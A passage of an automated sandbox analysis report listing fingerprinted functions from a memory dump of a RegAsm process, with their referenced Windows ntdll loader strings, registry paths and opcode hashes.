API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: 3eacc6bc633c5a2902e69dd2f5f1f512203a0db8263f8164e91710cd4b051449
Instruction ID: e1790d1d2063629fcf2562bf2130b44e55b6fdd1662db9af84bf62b03f31f4a3
Opcode Fuzzy Hash: 3eacc6bc633c5a2902e69dd2f5f1f512203a0db8263f8164e91710cd4b051449
Instruction Fuzzy Hash: 7871C170A087019FC755DF25C980AABBBEAFFC8758F108A1DE69A47251D730DA05CF92

Function 02D5B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON

Download Yara Rule

Strings

TargetNtPath, xrefs: 02D5B82F
GlobalizationUserSettings, xrefs: 02D5B834
\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 02D5B82A

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: 8b7f1b31d931badfbbc5eb2289ca4fb660c6f87360209ee144fbb810a7c6d8a6
Instruction ID: c65b8f6615b1937ece3c4b5d3ebe47c579d187c0f8fd09d45abbc4b67fd60462
Opcode Fuzzy Hash: 8b7f1b31d931badfbbc5eb2289ca4fb660c6f87360209ee144fbb810a7c6d8a6
Instruction Fuzzy Hash: 7C618D72D41638ABDF21DB54CC88B9AB7B9AF04758F0101EAE908A7350CB74DE84CF90

Function 02C7F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02CDE6B3
HEAP[%wZ]: , xrefs: 02CDE6A6
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 02CDE6C6

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: 986bb39d1e12f75f3558e5b0a169fe5257a4a546761214b77bfdaaff0ba87ad7
Instruction ID: 5ea304fe69f5477eaa7d55ec925de7f002ca539c4f0f77171578947515219863
Opcode Fuzzy Hash: 986bb39d1e12f75f3558e5b0a169fe5257a4a546761214b77bfdaaff0ba87ad7
Instruction Fuzzy Hash: CA512A31600684EFE712DBA8C994FAABBF9FF45704F1400A5E641CB692E774EE41DB60

Function 02C9F720 Relevance: 3.9, Strings: 3, Instructions: 159COMMON

Download Yara Rule

Strings

0,, xrefs: 02C9F7AB
$, xrefs: 02C9F7F6
$, xrefs: 02C9F860

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: $$$$0,
API String ID: 0-3692147673
Opcode ID: 3833dca9e55274a2e19d049e2264e989f0e366fe5b96649ab95de7c86728b453
Instruction ID: 5851f6b5446bc458c555335130b92b781aedc5f95f89b0f9ae38fffeb1c46d4f
Opcode Fuzzy Hash: 3833dca9e55274a2e19d049e2264e989f0e366fe5b96649ab95de7c86728b453
Instruction Fuzzy Hash: 6861BC71A0078ADFDF20EFA4C588BADB7B2FF44308F14446DD516ABA40DB74AA45DB90

Function 02CBC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

Failed to reallocate the system dirs string !, xrefs: 02CF82D7
LdrpInitializePerUserWindowsDirectory, xrefs: 02CF82DE
minkernel\ntdll\ldrinit.c, xrefs: 02CF82E8

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: c287c3f796d837e6ead079e6943e9c9c60703b48dfaff25e87c34ee80d7c5671
Instruction ID: 4524912c28e48bc84ddf275491718c770a3765ae69a5c3207e1677c4b04dab8c
Opcode Fuzzy Hash: c287c3f796d837e6ead079e6943e9c9c60703b48dfaff25e87c34ee80d7c5671
Instruction Fuzzy Hash: DF41FF72984300ABD721EB24DC84B9B77E9EF84750F80492BF94893260F778DE14CB92

Function 02CB16CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 02CF1B39
LdrpAllocateTls, xrefs: 02CF1B40
minkernel\ntdll\ldrtls.c, xrefs: 02CF1B4A

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: 17d1e959c0a1a388a36101b3fe142cde7e2dd384864d14a56865b62ad2b2a439
Instruction ID: c5f431afd80ebb0ccb7638cb8e5c0ed399223331346ee2bdac91f8f6b65128a2
Opcode Fuzzy Hash: 17d1e959c0a1a388a36101b3fe142cde7e2dd384864d14a56865b62ad2b2a439
Instruction Fuzzy Hash: 2F418B75A40644EFDB55DFA8C840BAEB7F6FF48704F188169E409A7700E7B5A900DF90

Function 02D3C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 02D3C212
@, xrefs: 02D3C1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 02D3C1C5

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 3a0c85825eb12b5bb3f012df5ba594c9b8fc05d11ffecf42008f5e2f7e4eb15a
Instruction ID: 253eadccc9148a957bdb8af2664c73b6685f8d76da9fbc80b0655e2c7df7383e
Opcode Fuzzy Hash: 3a0c85825eb12b5bb3f012df5ba594c9b8fc05d11ffecf42008f5e2f7e4eb15a
Instruction Fuzzy Hash: 19418B76A10219AFDF12DBD4C890BEEB7B9BB04B04F10806BE905B7280D7B49E44CB90

Function 02D14144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 02D14225
LdrpResValidateFilePath Enter, xrefs: 02D14160
LdrpResValidateFilePath Exit, xrefs: 02D14172

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: ff7634dd110c84bb81e92bab3897e9a3ca30b0400cd827c7acddf024330ce564
Instruction ID: 7795a69a0f9c32e0c3ef2c982208ead292a8e2e8c54ed5059dd0fa0cdec7c89f
Opcode Fuzzy Hash: ff7634dd110c84bb81e92bab3897e9a3ca30b0400cd827c7acddf024330ce564
Instruction Fuzzy Hash: 4E412472904698AFEB25DBE4E844BADB7B5FF45344F240499D841FBB90DB348D81CB10

Function 02D04755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 02D04888
minkernel\ntdll\ldrredirect.c, xrefs: 02D04899
LdrpCheckRedirection, xrefs: 02D0488F

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: c869cf9607fe3f8df7e6def15542025098793857d4eed0ba1393c74711dc1515
Instruction ID: b41e4c58216f9c22a26b9d7a3cd2f14e9c3ca8d9bee752f964636cf2976cc9de
Opcode Fuzzy Hash: c869cf9607fe3f8df7e6def15542025098793857d4eed0ba1393c74711dc1515
Instruction Fuzzy Hash: 2D419232A046909FCB21CE58D980F6677F9EF89650F050969EE89973B1E730EC14CBD5

Function 02CB33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context data, xrefs: 02CF29FE
Actx , xrefs: 02CB33AC
RtlCreateActivationContext, xrefs: 02CF29F9

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: c472bdfb76d44ef98a8cb72d0022447327e438945674a1e8124ae36b281628ee
Instruction ID: 6bf6d971360c659bcb56e4ae5e397230964ca06d98122352a28a9998bf5996a2
Opcode Fuzzy Hash: c472bdfb76d44ef98a8cb72d0022447327e438945674a1e8124ae36b281628ee
Instruction Fuzzy Hash: E53164322403819FEB23CF68C884BA67BA5EF84714F1544A9EE04DF281CB34ED41CB90

Function 02CB1607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

LdrpInitializeTls, xrefs: 02CF1A47
minkernel\ntdll\ldrtls.c, xrefs: 02CF1A51
DLL "%wZ" has TLS information at %p, xrefs: 02CF1A40

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: 0007cc06accd572784e58d29b94c7ec7e4fbb8a5c12289724f8844fd331895cd
Instruction ID: 8c678a940fb02014b12acdfb91f1e8b682478eb02170dde738d10d44d20b820a
Opcode Fuzzy Hash: 0007cc06accd572784e58d29b94c7ec7e4fbb8a5c12289724f8844fd331895cd
Instruction Fuzzy Hash: 5C312871E40200EBEB119B69D895FEA73BDFF51744F490469E909A7280E7F4AE04CB91

Function 02CC1270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

BuildLabEx, xrefs: 02CC130F
@, xrefs: 02CC12A5
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 02CC127B

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction ID: 552b15e9ea059ca1e24877dc62bc64aa1719e2adcc01194adddc352984eb7d4c
Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction Fuzzy Hash: 5431B372900518AFCF12EFA6CC44EDEBBBEEB84754F244029E908A7260D770DE45DB50

Function 02D020DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 02D02104
Process initialization failed with status 0x%08lx, xrefs: 02D020F3
LdrpInitializationFailure, xrefs: 02D020FA

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 4ea48392047c012331a68ab225772780487e0031ee3896e158d7a2e2a60dc733
Instruction ID: dc8a50a68785ec1fb041e30830c90d40379fc4cd3c17df9aa6a5e66dd8c44147
Opcode Fuzzy Hash: 4ea48392047c012331a68ab225772780487e0031ee3896e158d7a2e2a60dc733
Instruction Fuzzy Hash: 12F02831A80308BBE724D64CCC8BFA9376DEB40B48F500465FE00773C0D2B4AD14DA92

Function 02C903E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 02CE4D8A

Strings

#%u, xrefs: 02CE4D82

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: d3a8dd85cd95bccc1b0934b76820c32a53a061c3004d0e2fe867fee39d3f0545
Instruction ID: 4748d8e0a05c3853488b92c793bbd5c4c212641f60a4549b4af9a6308bbdd9d6
Opcode Fuzzy Hash: d3a8dd85cd95bccc1b0934b76820c32a53a061c3004d0e2fe867fee39d3f0545
Instruction Fuzzy Hash: 30715772A0014A9FDF15DFA9C994BAEB7F9EF48344F144069E905E7251EB34EE01CBA0

Function 02C952A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 02C95445
@, xrefs: 02C955A3

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: d07119f18b34aaa4c2ce01fe1b592fe261a02b39a7e1e93334c48d2042828156
Instruction ID: 568009a3895368601095fe187de719db0dec2ebc6dc0b8ad21c5e74e90fd1eb0
Opcode Fuzzy Hash: d07119f18b34aaa4c2ce01fe1b592fe261a02b39a7e1e93334c48d2042828156
Instruction Fuzzy Hash: 41328B705083518BCF258F19C498B7EB7E5EFC4788FA4491EF9869B290E734DA84CB52

Function 02D4A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 02D4A44B
`, xrefs: 02D4A551

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: e6603c510c0d1a7c84aac6b701aea966e25f1ef38c747fc443b134190dfb8acc
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: D5C1D1312447419BDB24CF28C865B6BBBE6EFC4318F184A2DF999CA390DB74D905CB91

Function 02CFE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 02CFE75A
UEFI, xrefs: 02CFE751

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: cb022af5fa4e5d44e8eb8c3d3600f4ce0f287f8678885a245eeb09aadfbecc33
Instruction ID: 8b3b969e3ec58ac8358200e9048a7e95eb5a37fa73ec7e2da646806a9ed11437
Opcode Fuzzy Hash: cb022af5fa4e5d44e8eb8c3d3600f4ce0f287f8678885a245eeb09aadfbecc33
Instruction Fuzzy Hash: 23614C71E002589FDBA4DFA9C884BAEBBB9FF44704F14406EE649EB261D731A940CB50

Function 02C8A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 02C8A309
RtlpResUltimateFallbackInfo Enter, xrefs: 02C8A2FB

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 2d9d84410add8bca194593642d4621ee5572884f193885f6fd707aeb79c715b8
Instruction ID: 1d17c83b3d3bb5b74f23d9c46688e02c0de769506f713256a50bb05afa95b8d7
Opcode Fuzzy Hash: 2d9d84410add8bca194593642d4621ee5572884f193885f6fd707aeb79c715b8
Instruction Fuzzy Hash: 0741C171A04659DBCB21DF69C440B6E77B4FF84708F2480A6EC0ADB2A1E735DA40CB51

Function 02CB329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 02CB330D
.Local\, xrefs: 02CB32B5

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: 4b8a08bb51bfd046b89ef52ae7e43c2c56abfa28326851a53c3cdbedd36856bf
Instruction ID: b429b6ad5935de9c3736a27713846835c1d6d41f784d02c4c15e67ebec5e428b
Opcode Fuzzy Hash: 4b8a08bb51bfd046b89ef52ae7e43c2c56abfa28326851a53c3cdbedd36856bf
Instruction Fuzzy Hash: F53194B15087849FC711DF29C884AABBBE8EFC4754F44096EF99983250DB34DD05DB92

Function 02C8C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 02C8C8C3, 02C8CA40

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 787647af83be3e77fd98160f16d738ea35b88aeb13ace3cf52cc6d2a12c7052e
Instruction ID: c55e51e4fb60e17f043131ba024dc5f4bfd7a09675020d325dbd0ca968c23e3e
Opcode Fuzzy Hash: 787647af83be3e77fd98160f16d738ea35b88aeb13ace3cf52cc6d2a12c7052e
Instruction Fuzzy Hash: 0D823F75E006589FDB28EFA9C9807EDB7B5BF84318F14C16AD85AAB290D7309E41CF50

Function 02C87370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 228b11e99a2609af0fc28b2c006edf49809c931cffe156417b2402d4bd8ca49c
Instruction ID: 7467840d3dbda62f1a36d728d16c3411526bdad634fff90780d6fcba7dc86823
Opcode Fuzzy Hash: 228b11e99a2609af0fc28b2c006edf49809c931cffe156417b2402d4bd8ca49c
Instruction Fuzzy Hash: F5A14B75A047418FC720DF29D480A2AFBE6BFC8308F24896DE59597350E770E949CF92

Function 02CBF603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90bd377814e6a1c1b0ccb68a291cafd09221e5b0c4bc2b946236640349380ba9
Instruction ID: 045da88f6268b5038a92731511a3edbef19d16909b8e7e6371bc7b884d2d2f66
Opcode Fuzzy Hash: 90bd377814e6a1c1b0ccb68a291cafd09221e5b0c4bc2b946236640349380ba9
Instruction Fuzzy Hash: D7412DB4D002489EDB25CFA9D880AEDBBF5FF48304F24456EE859A7351DB349944DF60

Function 02CBA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 02CF67C9

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 99c7811ff4ae4bb78d5643ad7db1847c7e5dac3da28afd6cdb7b8d757b267e79
Instruction ID: aea7230a1eb3bbae9558974c44d53675a135b99eea4abfa0f52d72fa3129944e
Opcode Fuzzy Hash: 99c7811ff4ae4bb78d5643ad7db1847c7e5dac3da28afd6cdb7b8d757b267e79
Instruction Fuzzy Hash: 33717E75E0021A9FDFA8CFA9C5906EDBBB6BF88704F24812EE516A7340E7319941CF50

Function 02C8973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

@, xrefs: 02C897F3

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction ID: da2605d2e201c11ec007f03dce5b21727f639edaee5d61bac6cbcd95472639ce
Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction Fuzzy Hash: 42618C71D0021AEFDF21EFA5C840BAEBBB9FF80718F158169E811B7290D7349A01DB61

Function 02D0F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 02D0F867

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction ID: 08e5c1b3a3379c5e381d3eeb6106a5954bd82fb741370874e51619fa069ea73b
Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction Fuzzy Hash: 2051DEB2904741AFD7219F54C880F6BB7E8FB84754F20092DFA80976A0DBB4ED04CB92

Function 02C9E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 02C9E6A4

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 3338012e35aaeb5917e7042977e55202daa5155a54486c30be62cfe9a4ddffc7
Instruction ID: 83a0427a21dcf73e1d02eee841d106551a090b988e624013fd2c024a90fd18dd
Opcode Fuzzy Hash: 3338012e35aaeb5917e7042977e55202daa5155a54486c30be62cfe9a4ddffc7
Instruction Fuzzy Hash: 4841D571508341ABDB10DA75C888B6BB7D9AFD8708F44092EFA85D7140E775DA04CB97

Function 02D3B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 02D3B28F

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: c0b8c558a9e3057942b44d3a681aec112bca130b64f1f41720e25710f3358760
Instruction ID: 20437b274c3105d4501e44e2e68a108c83c56b13debac2f0d4260c4371bc6d66
Opcode Fuzzy Hash: c0b8c558a9e3057942b44d3a681aec112bca130b64f1f41720e25710f3358760
Instruction Fuzzy Hash: D241A132D00229ABDF22DA94C840BEEB7B9EF44758F05416BE981EB350D774DE40CBA0

Function 02D097A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

verifier.dll, xrefs: 02D09870

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: d06a63a472fc05123b0f2065b417033ab59b218a90a9a00c57be8de6e6e19e34
Instruction ID: 65a3f779cefd6252da5ebca24b2a74f03cd1ae4588fc3f4bbdff15256e4b7828
Opcode Fuzzy Hash: d06a63a472fc05123b0f2065b417033ab59b218a90a9a00c57be8de6e6e19e34
Instruction Fuzzy Hash: CB31B271E403019FDB249F28A8A0BA673E5EB49B14F94843AE948DF3D2E7318C80C794

Function 02D2705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

kLsE, xrefs: 02D270A4

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: kLsE
API String ID: 0-3058123920
Opcode ID: fd4869436f19d59be159d6a7780baab14f8b8d585c8840767913795b233f93e4
Instruction ID: 7cea743be196767f527bf19f012c771c445d9089e7a69f85310a2d55b4bc5bb4
Opcode Fuzzy Hash: fd4869436f19d59be159d6a7780baab14f8b8d585c8840767913795b233f93e4
Instruction Fuzzy Hash: 79415D319407A087F731AF64D9447657BA9EB40B1CF140958DD508A3C1FB788C9DCBE1

Function 02CB36EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

Flst, xrefs: 02CB3731

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: Flst
API String ID: 0-2374792617
Opcode ID: 8efcd5fed600ffe6a3a6cf5ed893d45e883e94f02da23161c93a5ebf38d161c1
Instruction ID: f56f1970bed13493735a49184d748beb5679fef02df337b07b907c5bbf3fc924
Opcode Fuzzy Hash: 8efcd5fed600ffe6a3a6cf5ed893d45e883e94f02da23161c93a5ebf38d161c1
Instruction Fuzzy Hash: 5D41DBB0205301DFC355CF29C680A56FBE4EF89714F1481AEE95ADF281EB31DA46CB92

Function 02C7C156 Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

P, xrefs: 02C7C15C, 02C7C17C, 02CDD698

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-1343716551
Opcode ID: 4837dcabc0124f301a43682a3fd1ba0d1e1bb3da705afdac974b9b54c2d8bfe1
Instruction ID: c0401bee2ec357046a7ea9d41d703d809de42378b048e1fdf53e0fccee191bca
Opcode Fuzzy Hash: 4837dcabc0124f301a43682a3fd1ba0d1e1bb3da705afdac974b9b54c2d8bfe1
Instruction Fuzzy Hash: 753140769002109BCB20AF18CC44B6977B5EF80314F54C5E9DD869B341EB74DE86CF90

Function 02C85096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 02C850BF

Memory Dump Source

